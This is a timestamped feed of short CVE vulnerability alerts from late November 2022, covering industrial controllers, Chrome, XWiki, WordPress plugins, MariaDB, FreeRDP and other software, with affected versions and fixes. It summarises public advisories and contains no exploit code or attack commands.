🚨 CVE-2022-0222A CWE-269: Improper Privilege Management vulnerability exists that could cause a denial of service of the Ethernet communication of the controller when sending a specific request over SNMP. Affected products: Modicon M340 CPUs(BMXP34* versions prior to V3.40), Modicon M340 X80 Ethernet Communication modules:BMXNOE0100 (H), BMXNOE0110 (H), BMXNOR0200H RTU(BMXNOE* all versions)(BMXNOR* versions prior to v1.7 IR24)🎖@cveNotify |
|
| 2022-11-30 22:02:11 |
🚨 CVE-2022-2513A vulnerability exists in the Intelligent Electronic Device (IED) Connectivity Package (ConnPack) credential storage function in Hitachi Energy’s PCM600 product included in the versions listed below, where IEDs credentials are stored in a cleartext format in the PCM600 database. An attacker who manages to get access to the exported backup file can exploit the vulnerability and obtain credentials of the IEDs. The credentials may be used to perform unauthorized modifications such as loading incorrect configurations, reboot the IEDs or cause a denial-of-service on the IEDs.🎖@cveNotify |
|
| 2022-11-30 22:02:10 |
🚨 CVE-2022-26885When using tasks to read config files, there is a risk of database password disclosure. We recommend you upgrade to version 2.0.6 or higher.🎖@cveNotify |
|
| 2022-11-30 22:02:09 |
🚨 CVE-2022-45475Tiny File Manager version 2.4.8 allows an unauthenticated remote attacker to execute arbitrary code remotely on the server. This is possible because the application is vulnerable to CSRF, processes uploaded files server-side (instead of just returning them for download), and allows unauthenticated users to access uploaded files.🎖@cveNotify |
|
| 2022-11-30 22:02:08 |
🚨 CVE-2022-37301A CWE-191: Integer Underflow (Wrap or Wraparound) vulnerability exists that could cause a denial of service of the controller due to memory access violations when using the Modbus TCP protocol. Affected products: Modicon M340 CPU (part numbers BMXP34*)(V3.40 and prior), Modicon M580 CPU (part numbers BMEP* and BMEH*)(V3.22 and prior), Legacy Modicon Quantum/Premium(All Versions), Modicon Momentum MDI (171CBU*)(All Versions), Modicon MC80 (BMKC80)(V1.7 and prior)🎖@cveNotify |
|
| 2022-11-30 22:02:04 |
🚨 CVE-2022-40976A path traversal vulnerability was discovered in multiple Pilz products. An unauthenticated local attacker could use a zipped, malicious configuration file to trigger arbitrary file writes ('zip-slip').🎖@cveNotify |
|
| 2022-11-30 22:02:03 |
🚨 CVE-2022-45476Tiny File Manager version 2.4.8 allows an unauthenticated remote attacker to execute arbitrary code remotely on the server. This is possible because the application is vulnerable to CSRF, processes uploaded files server-side (instead of just returning them for download), and allows unauthenticated users to access uploaded files.🎖@cveNotify |
|
| 2022-11-30 22:02:02 |
🚨 CVE-2022-40266Improper Input Validation vulnerability in Mitsubishi Electric GOT2000 Series GT27 model FTP server versions 01.39.000 and prior, Mitsubishi Electric GOT2000 Series GT25 model FTP server versions 01.39.000 and prior and Mitsubishi Electric GOT2000 Series GT23 model FTP server versions 01.39.000 and prior allows a remote authenticated attacker to cause a Denial of Service condition by sending specially crafted command.🎖@cveNotify |
|
| 2022-11-30 22:02:01 |
🚨 CVE-2022-4136Dangerous method exposed which can lead to RCE in qmpass/leadshop v1.4.15 allows an attacker to control the target host by calling any function in leadshop.php via the GET method.🎖@cveNotify |
|
| 2022-11-30 22:01:56 |
🚨 CVE-2022-44749A directory traversal vulnerability in the ZIP archive extraction routines of KNIME Analytics Platform 3.2.0 and above can result in arbitrary files being overwritten on the user's system. This vulnerability is also known as 'Zip-Slip'. An attacker can create a KNIME workflow that, when being opened by a user, can overwrite arbitrary files that the user has write access to. It's not necessary to execute the workflow, opening the workflow is sufficient. The user will notice that something is wrong because an error is being reported but only after the files have already been written. This can impact data integrity (file contents are changed) or cause errors in other software (vital files being corrupted). It can even lead to remote code execution if executable files are being replaced and subsequently executed by the user. In all cases the attacker has to know the location of files on the user's system, though.🎖@cveNotify |
|
| 2022-11-30 22:01:55 |
🚨 CVE-2022-44748A directory traversal vulnerability in the ZIP archive extraction routines of KNIME Server since 4.3.0 can result in arbitrary files being overwritten on the server's file system. This vulnerability is also known as 'Zip-Slip'. An attacker can create a KNIME workflow that, when being uploaded, can overwrite arbitrary files that the operating system user running the KNIME Server process has write access to. The user must be authenticated and have permissions to upload files to KNIME Server. This can impact data integrity (file contents are changed) or cause errors in other software (vital files being corrupted). It can even lead to remote code execution if executable files are being replaced and subsequently executed by the KNIME Server process user. In all cases the attacker has to know the location of files on the server's file system, though. Note that users that have permissions to upload workflows usually also have permissions to run them on the KNIME Server and can therefore already execute arbitrary code in the context of the KNIME Executor's operating system user. There is no workaround to prevent this vulnerability from being exploited. Updates to fixed versions 4.13.6, 4.14.3, or 4.15.3 are advised.🎖@cveNotify |
|
| 2022-11-30 22:01:54 |
🚨 CVE-2022-23746The IPsec VPN blade has a dedicated portal for downloading and connecting through SSL Network Extender (SNX). If the portal is configured for username/password authentication, it is vulnerable to a brute-force attack on usernames and passwords.🎖@cveNotify |
|
| 2022-11-30 22:01:53 |
🚨 CVE-2022-23743Check Point ZoneAlarm before version 15.8.200.19118 allows a local actor to escalate privileges during the upgrade process. In addition, weak permissions in the ProgramData\CheckPoint\ZoneAlarm\Data\Updates directory allow a local attacker the ability to execute an arbitrary file write, leading to execution of code as local system, in ZoneAlarm versions before v15.8.211.192119🎖@cveNotify |
|
| 2022-11-30 22:01:52 |
🚨 CVE-2022-28805singlevar in lparser.c in Lua from (including) 5.4.0 up to (excluding) 5.4.4 lacks a certain luaK_exp2anyregup call, leading to a heap-based buffer over-read that might affect a system that compiles untrusted Lua code.🎖@cveNotify |
|
| 2022-11-30 21:02:14 |
🚨 CVE-2022-35897An stack buffer overflow vulnerability leads to arbitrary code execution issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. If the attacker modifies specific UEFI variables, it can cause a stack overflow, leading to arbitrary code execution. The specific variables are normally locked (read-only) at the OS level and therefore an attack would require direct SPI modification. If an attacker can change the values of at least two variables out of three (SecureBootEnforce, SecureBoot, RestoreBootSettings), it is possible to execute arbitrary code.🎖@cveNotify |
|
| 2022-11-30 21:02:13 |
🚨 CVE-2022-37454The Keccak XKCP SHA-3 reference implementation before fdc6fef has an integer overflow and resultant buffer overflow that allows attackers to execute arbitrary code or eliminate expected cryptographic properties. This occurs in the sponge function interface.🎖@cveNotify |
|
| 2022-11-30 21:02:10 |
🚨 CVE-2021-3827A flaw was found in keycloak, where the default ECP binding flow allows other authentication flows to be bypassed. By exploiting this behavior, an attacker can bypass the MFA authentication by sending a SOAP request with an AuthnRequest and Authorization header with the user's credentials. The highest threat from this vulnerability is to confidentiality and integrity.🎖@cveNotify |
|
| 2022-11-30 21:02:09 |
🚨 CVE-2022-44151Simple Inventory Management System v1.0 is vulnerable to SQL Injection via /ims/login.php.🎖@cveNotify |
|
| 2022-11-30 21:02:08 |
🚨 CVE-2022-4234A vulnerability was found in SourceCodester Canteen Management System. It has been rated as problematic. This issue affects the function builtin_echo of the file youthappam/brand.php. The manipulation of the argument brand_name leads to cross site scripting. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214595.🎖@cveNotify |
|
| 2022-11-30 21:02:07 |
🚨 CVE-2022-44294Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/?page=services/manage_service&id=.🎖@cveNotify |
|
| 2022-11-30 21:02:03 |
🚨 CVE-2022-44296Sanitization Management System v1.0 is vulnerable to SQL Injection via /php-sms/admin/quotes/manage_remark.php?id=.🎖@cveNotify |
|
| 2022-11-30 21:02:02 |
🚨 CVE-2022-35407An issue was discovered in Insyde InsydeH2O with kernel 5.0 through 5.5. A stack buffer overflow leads to arbitrary code execution in the SetupUtility driver on Intel platforms. An attacker can change the values of certain UEFI variables. If the size of the second variable exceeds the size of the first, then the buffer will be overwritten. This issue affects the SetupUtility driver of InsydeH2O.🎖@cveNotify |
|
| 2022-11-30 21:02:01 |
🚨 CVE-2022-41932XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. It's possible to make XWiki create many new schemas and fill them with tables just by using a crafted user identifier in the login form. This may lead to degraded database performance. The problem has been patched in XWiki 13.10.8, 14.6RC1 and 14.4.2. Users are advised to upgrade. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-11-30 21:01:57 |
🚨 CVE-2022-30529File upload vulnerability in asith-eranga ISIC tour booking through version published on Feb 13th 2018, allows attackers to upload arbitrary files via /system/application/libs/js/tinymce/plugins/filemanager/dialog.php and /system/application/libs/js/tinymce/plugins/filemanager/upload.php.🎖@cveNotify |
|
| 2022-11-30 21:01:56 |
🚨 CVE-2022-41934XWiki Platform is a generic wiki platform offering runtime services for applications built on top of it. Any user with view rights on commonly accessible documents including the menu macro can execute arbitrary Groovy, Python or Velocity code in XWiki leading to full access to the XWiki installation due to improper escaping of the macro content and parameters of the menu macro. The problem has been patched in XWiki 14.6RC1, 13.10.8 and 14.4.3. The patch (commit `2fc20891`) for the document `Menu.MenuMacro` can be manually applied or a XAR archive of a patched version can be imported. The menu macro was basically unchanged since XWiki 11.6 so on XWiki 11.6 or later the patch for version of 13.10.8 (commit `59ccca24a`) can most likely be applied, on XWiki version 14.0 and later the versions in XWiki 14.6 and 14.4.3 should be appropriate.🎖@cveNotify |
|
| 2022-11-30 21:01:55 |
🚨 CVE-2022-41931xwiki-platform-icon-ui is vulnerable to Improper Neutralization of Directives in Dynamically Evaluated Code ('Eval Injection'). Any user with view rights on commonly accessible documents including the icon picker macro can execute arbitrary Groovy, Python or Velocity code in XWiki due to improper neutralization of the macro parameters of the icon picker macro. The problem has been patched in XWiki 13.10.7, 14.5 and 14.4.2. Workarounds: The [patch](https://github.com/xwiki/xwiki-platform/commit/47eb8a5fba550f477944eb6da8ca91b87eaf1d01) can be manually applied by editing `IconThemesCode.IconPickerMacro` in the object editor. The whole document can also be replaced by the current version by importing the document from the XAR archive of a fixed version as the only changes to the document have been security fixes and small formatting changes.🎖@cveNotify |
|
| 2022-11-30 15:01:53 |
🚨 CVE-2022-4229A vulnerability classified as critical was found in SourceCodester Book Store Management System 1.0. This vulnerability affects unknown code of the file /bsms_ci/index.php. The manipulation leads to improper access controls. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-214588.🎖@cveNotify |
|
| 2022-11-30 15:01:52 |
🚨 CVE-2022-4232A vulnerability, which was classified as critical, was found in SourceCodester Event Registration System 1.0. Affected is an unknown function. The manipulation of the argument cmd leads to unrestricted upload. It is possible to launch the attack remotely. VDB-214590 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2022-11-30 15:01:51 |
🚨 CVE-2022-4233A vulnerability has been found in SourceCodester Event Registration System 1.0 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /event/admin/?page=user/list. The manipulation of the argument First Name/Last Name leads to cross site scripting. The attack can be launched remotely. The associated identifier of this vulnerability is VDB-214591.🎖@cveNotify |
|
| 2022-11-30 12:01:53 |
🚨 CVE-2022-4222A vulnerability was found in SourceCodester Canteen Management System. It has been rated as critical. This issue affects the function query of the file ajax_invoice.php of the component POST Request Handler. The manipulation of the argument search leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-214523.🎖@cveNotify |
|
| 2022-11-30 12:01:52 |
🚨 CVE-2022-46338g810-led 0.4.2, a LED configuration tool for Logitech Gx10 keyboards, contained a udev rule to make supported device nodes world-readable and writable, allowing any process on the system to read traffic from keyboards, including sensitive data.🎖@cveNotify |
|
| 2022-11-30 08:02:13 |
🚨 CVE-2022-42099KLiK SocialMediaWebsite Version 1.0.1 has XSS vulnerabilities that allow attackers to store XSS via location Forum Subject input.🎖@cveNotify |
|
| 2022-11-30 08:02:12 |
🚨 CVE-2022-42100KLiK SocialMediaWebsite Version 1.0.1 has XSS vulnerabilities that allow attackers to store XSS via location input reply-form.🎖@cveNotify |
|
| 2022-11-30 08:02:11 |
🚨 CVE-2022-45329AeroCMS v0.0.1 was discovered to contain a SQL Injection vulnerability via the Search parameter. This vulnerability allows attackers to access database information.🎖@cveNotify |
|
| 2022-11-30 08:02:10 |
🚨 CVE-2022-45061An issue was discovered in Python before 3.11.1. An unnecessary quadratic algorithm exists in one path when processing some inputs to the IDNA (RFC 3490) decoder, such that a crafted, unreasonably long name being presented to the decoder could lead to a CPU denial of service. Hostnames are often supplied by remote servers that could be controlled by a malicious actor; in such a scenario, they could trigger excessive CPU consumption on the client attempting to make use of an attacker-supplied supposed hostname. For example, the attack payload could be placed in the Location header of an HTTP response with status code 302. A fix is planned in 3.11.1, 3.10.9, 3.9.16, 3.8.16, and 3.7.16.🎖@cveNotify |
|
| 2022-11-30 08:02:06 |
🚨 CVE-2022-38791In MariaDB before 10.9.2, compress_write in extra/mariabackup/ds_compress.cc does not release data_mutex upon a stream write failure, which allows local users to trigger a deadlock.🎖@cveNotify |
|
| 2022-11-30 08:02:05 |
🚨 CVE-2022-32082MariaDB v10.5 to v10.7 was discovered to contain an assertion failure at table->get_ref_count() == 0 in dict0dict.cc.🎖@cveNotify |
|
| 2022-11-30 08:02:04 |
🚨 CVE-2022-32089MariaDB v10.5 to v10.7 was discovered to contain a segmentation fault via the component st_select_lex_unit::exclude_level.🎖@cveNotify |
|
| 2022-11-30 08:02:00 |
🚨 CVE-2022-32091MariaDB v10.7 was discovered to contain an use-after-poison in in __interceptor_memset at /libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc.🎖@cveNotify |
|
| 2022-11-30 08:01:59 |
🚨 CVE-2022-36136ChurchCRM Version 4.4.5 has XSS vulnerabilities that allow attackers to store XSS via location input Deposit Comment.🎖@cveNotify |
|
| 2022-11-30 08:01:58 |
🚨 CVE-2022-45224Web-Based Student Clearance System v1.0 was discovered to contain a cross-site scripting (XSS) vulnerability in Admin/add-admin.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the txtfullname parameter.🎖@cveNotify |
|
| 2022-11-30 08:01:54 |
🚨 CVE-2022-31877An issue in the component MSI.TerminalServer.exe of MSI Center v1.0.41.0 allows attackers to escalate privileges via a crafted TCP packet.🎖@cveNotify |
|
| 2022-11-30 08:01:53 |
🚨 CVE-2022-3850The Find and Replace All WordPress plugin before 1.3 does not have CSRF check when replacing string, which could allow attackers to make a logged admin replace arbitrary string in database tables via a CSRF attack🎖@cveNotify |
|
| 2022-11-30 08:01:52 |
🚨 CVE-2022-3849The WP User Merger WordPress plugin before 1.5.3 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by users with a role as low as admin🎖@cveNotify |
|
| 2022-11-30 03:03:06 |
🚨 CVE-2022-4174Type confusion in V8 in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-11-30 03:03:04 |
🚨 CVE-2022-4182Inappropriate implementation in Fenced Frames in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass fenced frame restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:03:03 |
🚨 CVE-2022-4175Use after free in Camera Capture in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-11-30 03:03:02 |
🚨 CVE-2022-4183Insufficient policy enforcement in Popup Blocker in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass navigation restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:03:01 |
🚨 CVE-2022-4176Out of bounds write in Lacros Graphics in Google Chrome on Chrome OS and Lacros prior to 108.0.5359.71 allowed a remote attacker who convinced a user to engage in specific UI interactions to potentially exploit heap corruption via UI interactions. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-11-30 03:03:00 |
🚨 CVE-2022-4184Insufficient policy enforcement in Autofill in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass autofill restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:58 |
🚨 CVE-2022-4177Use after free in Extensions in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install an extension to potentially exploit heap corruption via a crafted Chrome Extension and UI interaction. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-11-30 03:02:57 |
🚨 CVE-2022-4185Inappropriate implementation in Navigation in Google Chrome on iOS prior to 108.0.5359.71 allowed a remote attacker to spoof the contents of the modal dialogue via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:56 |
🚨 CVE-2022-4179Use after free in Audio in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install a malicious extension to potentially exploit heap corruption via a crafted Chrome Extension. (Chromium security severity: High)🎖@cveNotify |
|
| 2022-11-30 03:02:55 |
🚨 CVE-2022-4186Insufficient validation of untrusted input in Downloads in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install a malicious extension to bypass Downloads restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:51 |
🚨 CVE-2022-4187Insufficient policy enforcement in DevTools in Google Chrome on Windows prior to 108.0.5359.71 allowed a remote attacker to bypass filesystem restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:50 |
🚨 CVE-2022-4188Insufficient validation of untrusted input in CORS in Google Chrome on Android prior to 108.0.5359.71 allowed a remote attacker to bypass same origin policy via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:49 |
🚨 CVE-2022-4189Insufficient policy enforcement in DevTools in Google Chrome prior to 108.0.5359.71 allowed an attacker who convinced a user to install a malicious extension to bypass navigation restrictions via a crafted Chrome Extension. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:48 |
🚨 CVE-2022-4191Use after free in Sign-In in Google Chrome prior to 108.0.5359.71 allowed a remote attacker who convinced a user to engage in specific UI interaction to potentially exploit heap corruption via profile destruction. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:43 |
🚨 CVE-2022-4193Insufficient policy enforcement in File System API in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass file system restrictions via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:42 |
🚨 CVE-2022-4194Use after free in Accessibility in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:41 |
🚨 CVE-2022-4195Insufficient policy enforcement in Safe Browsing in Google Chrome prior to 108.0.5359.71 allowed a remote attacker to bypass Safe Browsing warnings via a malicious file. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2022-11-30 03:02:40 |
🚨 CVE-2022-46155Airtable.js is the JavaScript client for Airtable. Prior to version 0.11.6, Airtable.js had a misconfigured build script in its source package. When the build script is run, it would bundle environment variables into the build target of a transpiled bundle. Specifically, the AIRTABLE_API_KEY and AIRTABLE_ENDPOINT_URL environment variables are inserted during Browserify builds due to being referenced in Airtable.js code. This only affects copies of Airtable.js built from its source, not those installed via npm or yarn. Airtable API keys set in users’ environments via the AIRTABLE_API_KEY environment variable may be bundled into local copies of Airtable.js source code if all of the following conditions are met: 1) the user has cloned the Airtable.js source onto their machine, 2) the user runs the `npm prepare` script, and 3) the user' has the AIRTABLE_API_KEY environment variable set. If these conditions are met, a user’s local build of Airtable.js would be modified to include the value of the AIRTABLE_API_KEY environment variable, which could then be accidentally shipped in the bundled code. Users who do not meet all three of these conditions are not impacted by this issue. Users should upgrade to Airtable.js version 0.11.6 or higher; or, as a workaround unset the AIRTABLE_API_KEY environment variable in their shell and/or remove it from your .bashrc, .zshrc, or other shell configuration files. Users should also regenerate any Airtable API keys they use, as the keysy may be present in bundled code.🎖@cveNotify |
|
| 2022-11-30 00:03:08 |
🚨 CVE-2021-31693VMware Tools for Windows (12.x.y prior to 12.1.5, 11.x.y and 10.x.y) contains a denial-of-service vulnerability in the VM3DMP driver. A malicious actor with local user privileges in the Windows guest OS, where VMware Tools is installed, can trigger a PANIC in the VM3DMP driver leading to a denial-of-service condition in the Windows guest OS.🎖@cveNotify |
|
| 2022-11-30 00:03:07 |
🚨 CVE-2022-36960SolarWinds Platform was susceptible to Improper Input Validation. This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to escalate user privileges.🎖@cveNotify |
|
| 2022-11-30 00:03:06 |
🚨 CVE-2022-36962SolarWinds Platform was susceptible to Command Injection. This vulnerability allows a remote adversary with complete control over the SolarWinds database to execute arbitrary commands.🎖@cveNotify |
|
| 2022-11-30 00:03:05 |
🚨 CVE-2022-36964SolarWinds Platform was susceptible to the Deserialization of Untrusted Data. This vulnerability allows a remote adversary with valid access to SolarWinds Web Console to execute arbitrary commands.🎖@cveNotify |
|
| 2022-11-30 00:03:04 |
🚨 CVE-2022-44279Garage Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /garage/php_action/createBrand.php.🎖@cveNotify |
|
| 2022-11-30 00:03:00 |
🚨 CVE-2022-3898The WP Affiliate Platform plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to, and including, 6.3.9. This is due to missing or incorrect nonce validation on various functions including the affiliates_menu method. This makes it possible for unauthenticated attackers to delete affiliate records, via forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2022-11-30 00:02:59 |
🚨 CVE-2022-3991The Photospace Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via its settings parameters saved via the update() function in versions up to, and including, 2.3.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2022-11-30 00:02:58 |
🚨 CVE-2022-3995The TeraWallet plugin for WordPress is vulnerable to Insecure Direct Object Reference in versions up to, and including, 1.4.3. This is due to insufficient validation of the user-controlled key on the lock_unlock_terawallet AJAX action. This makes it possible for authenticated attackers, with subscriber-level permissions and above, to lock/unlock other users wallets.🎖@cveNotify |
|
| 2022-11-30 00:02:57 |
🚨 CVE-2022-4027The Simple:Press plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'postitem' parameter manipulated during a forum response in versions up to, and including, 6.8 due to insufficient input sanitization and output escaping that makes injecting object and embed tags possible. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages when responding to forum threads that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2022-11-30 00:02:56 |
🚨 CVE-2022-4028The Simple:Press plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'postitem' parameter manipulated during the profile-save action when modifying a profile signature in versions up to, and including, 6.8 due to insufficient input sanitization and output escaping that makes injecting object and embed tags possible. This makes it possible for authenticated attackers, with minimal permissions, such as a subscriber to inject arbitrary web scripts in pages when modifying a profile signature that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2022-11-30 00:02:52 |
🚨 CVE-2022-4029The Simple:Press plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'sforum_[md5 hash of the WordPress URL]' cookie value in versions up to, and including, 6.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. This would be highly complex to exploit as it would require the attacker to set the cookie a cookie for the targeted user.🎖@cveNotify |
|
| 2022-11-30 00:02:51 |
🚨 CVE-2022-4030The Simple:Press plugin for WordPress is vulnerable to Path Traversal in versions up to, and including, 6.8 via the 'file' parameter which can be manipulated during user avatar deletion. This makes it possible with attackers, with minimal permissions such as a subscriber, to supply paths to arbitrary files on the server that will subsequently be deleted. This can be used to delete the wp-config.php file that can allow an attacker to configure the site and achieve remote code execution.🎖@cveNotify |
|
| 2022-11-30 00:02:50 |
🚨 CVE-2022-4031The Simple:Press plugin for WordPress is vulnerable to arbitrary file modifications in versions up to, and including, 6.8 via the 'file' parameter which does not properly restrict files to be edited in the context of the plugin. This makes it possible with attackers, with high-level permissions such as an administrator, to supply paths to arbitrary files on the server that can be modified outside of the intended scope of the plugin.🎖@cveNotify |
|
| 2022-11-30 00:02:49 |
🚨 CVE-2022-4033The Quiz and Survey Master plugin for WordPress is vulnerable to input validation bypass via the 'question[id]' parameter in versions up to, and including, 8.0.4 due to insufficient input validation that allows attackers to inject content other than the specified value (i.e. a number, file path, etc..). This makes it possible attackers to submit values other than the intended input type.🎖@cveNotify |
|
| 2022-11-30 00:02:45 |
🚨 CVE-2022-4034The Appointment Hour Booking Plugin for WordPress is vulnerable to CSV Injection in versions up to, and including, 1.3.72. This makes it possible for unauthenticated attackers to embed untrusted input into content during booking creation that may be exported as a CSV file when a site's administrator exports booking details. This can result in code execution when these files are downloaded and opened on a local system with a vulnerable configuration.🎖@cveNotify |
|
| 2022-11-30 00:02:44 |
🚨 CVE-2022-4035The Appointment Hour Booking plugin for WordPress is vulnerable to iFrame Injection via the ‘email’ or general field parameters in versions up to, and including, 1.3.72 due to insufficient input sanitization and output escaping that makes injecting iFrame tags possible. This makes it possible for unauthenticated attackers to inject iFrames when submitting a booking that will execute whenever a user accesses the injected booking details page.🎖@cveNotify |
|
| 2022-11-30 00:02:43 |
🚨 CVE-2022-4036The Appointment Hour Booking plugin for WordPress is vulnerable to CAPTCHA bypass in versions up to, and including, 1.3.72. This is due to the use of insufficiently strong hashing algorithm on the CAPTCHA secret that is also displayed to the user via a cookie.🎖@cveNotify |
|
| 2022-11-30 00:02:42 |
🚨 CVE-2022-3361The Ultimate Member plugin for WordPress is vulnerable to directory traversal in versions up to, and including 2.5.0 due to insufficient input validation on the 'template' attribute used in shortcodes. This makes it possible for attackers with administrative privileges to supply arbitrary paths using traversal (../../) to access and include files outside of the intended directory. If an attacker can successfully upload a php file then remote code execution via inclusion may also be possible. Note: for users with less than administrative capabilities, /wp-admin access needs to be enabled for that user in order for this to be exploitable by those users.🎖@cveNotify |
|
| 2022-11-30 00:02:41 |
🚨 CVE-2022-3383The Ultimate Member plugin for WordPress is vulnerable to Remote Code Execution in versions up to, and including, 2.5.0 via the get_option_value_from_callback function that accepts user supplied input and passes it through call_user_func(). This makes it possible for authenticated attackers, with administrative capabilities, to execute code on the server.🎖@cveNotify |
|
| 2022-11-29 22:02:40 |
🚨 CVE-2022-40771Zoho ManageEngine ServiceDesk Plus versions 13010 and prior are vulnerable to an XML External Entity attack that leads to Information Disclosure.🎖@cveNotify |
|
| 2022-11-29 22:02:39 |
🚨 CVE-2022-44279Garage Management System v1.0 is vulnerable to Cross Site Scripting (XSS) via /garage/php_action/createBrand.php.🎖@cveNotify |
|
| 2022-11-29 22:02:37 |
🚨 CVE-2022-40772Zoho ManageEngine ServiceDesk Plus versions 13010 and prior are vulnerable to a validation bypass that allows users to access sensitive data via the report module.🎖@cveNotify |
|
| 2022-11-29 22:02:36 |
🚨 CVE-2022-39316FreeRDP is a free remote desktop protocol library and clients. In affected versions there is an out of bound read in ZGFX decoder component of FreeRDP. A malicious server can trick a FreeRDP based client to read out of bound data and try to decode it likely resulting in a crash. This issue has been addressed in the 2.9.0 release. Users are advised to upgrade.🎖@cveNotify |
|
| 2022-11-29 22:02:32 |
🚨 CVE-2022-39347FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP are missing path canonicalization and base path check for `drive` channel. A malicious server can trick a FreeRDP based client to read files outside the shared directory. This issue has been addressed in version 2.9.0 and all users are advised to upgrade. Users unable to upgrade should not use the `/drive`, `/drives` or `+home-drive` redirection switch.🎖@cveNotify |
|
| 2022-11-29 22:02:31 |
🚨 CVE-2022-39317FreeRDP is a free remote desktop protocol library and clients. Affected versions of FreeRDP are missing a range check for input offset index in ZGFX decoder. A malicious server can trick a FreeRDP based client to read out of bound data and try to decode it. This issue has been addressed in version 2.9.0. There are no known workarounds for this issue.🎖@cveNotify |
|
| 2022-11-29 22:02:30 |
🚨 CVE-2017-13756In The Sleuth Kit (TSK) 4.4.2, opening a crafted disk image triggers infinite recursion in dos_load_ext_table() in tsk/vs/dos.c in libtskvs.a, as demonstrated by mmls.🎖@cveNotify |
|
| 2022-11-29 22:02:29 |
🚨 CVE-2022-41404An issue in the fetch() method in the BasicProfile class of org.ini4j before v0.5.4 allows attackers to cause a Denial of Service (DoS) via unspecified vectors.🎖@cveNotify |
|
| 2022-11-29 22:02:28 |
🚨 CVE-2019-18928Cyrus IMAP 2.5.x before 2.5.14 and 3.x before 3.0.12 allows privilege escalation because an HTTP request may be interpreted in the authentication context of an unrelated previous request that arrived over the same connection.🎖@cveNotify |
|
| 2022-11-29 22:02:27 |
🚨 CVE-2017-13760In The Sleuth Kit (TSK) 4.4.2, fls hangs on a corrupt exfat image in tsk_img_read() in tsk/img/img_io.c in libtskimg.a.🎖@cveNotify |
|
| 2022-11-29 22:02:26 |
🚨 CVE-2017-13755In The Sleuth Kit (TSK) 4.4.2, opening a crafted ISO 9660 image triggers an out-of-bounds read in iso9660_proc_dir() in tsk/fs/iso9660_dent.c in libtskfs.a, as demonstrated by fls.🎖@cveNotify |
|
| 2022-11-29 22:02:24 |
🚨 CVE-2020-11653An issue was discovered in Varnish Cache before 6.0.6 LTS, 6.1.x and 6.2.x before 6.2.3, and 6.3.x before 6.3.2. It occurs when communication with a TLS termination proxy uses PROXY version 2. There can be an assertion failure and daemon restart, which causes a performance loss.🎖@cveNotify |
|
| 2022-11-29 22:02:23 |
🚨 CVE-2018-19497In The Sleuth Kit (TSK) through 4.6.4, hfs_cat_traverse in tsk/fs/hfs.c does not properly determine when a key length is too large, which allows attackers to cause a denial of service (SEGV on unknown address with READ memory access in a tsk_getu16 call in hfs_dir_open_meta_cb in tsk/fs/hfs_dent.c).🎖@cveNotify |
|
| 2022-11-29 22:02:19 |
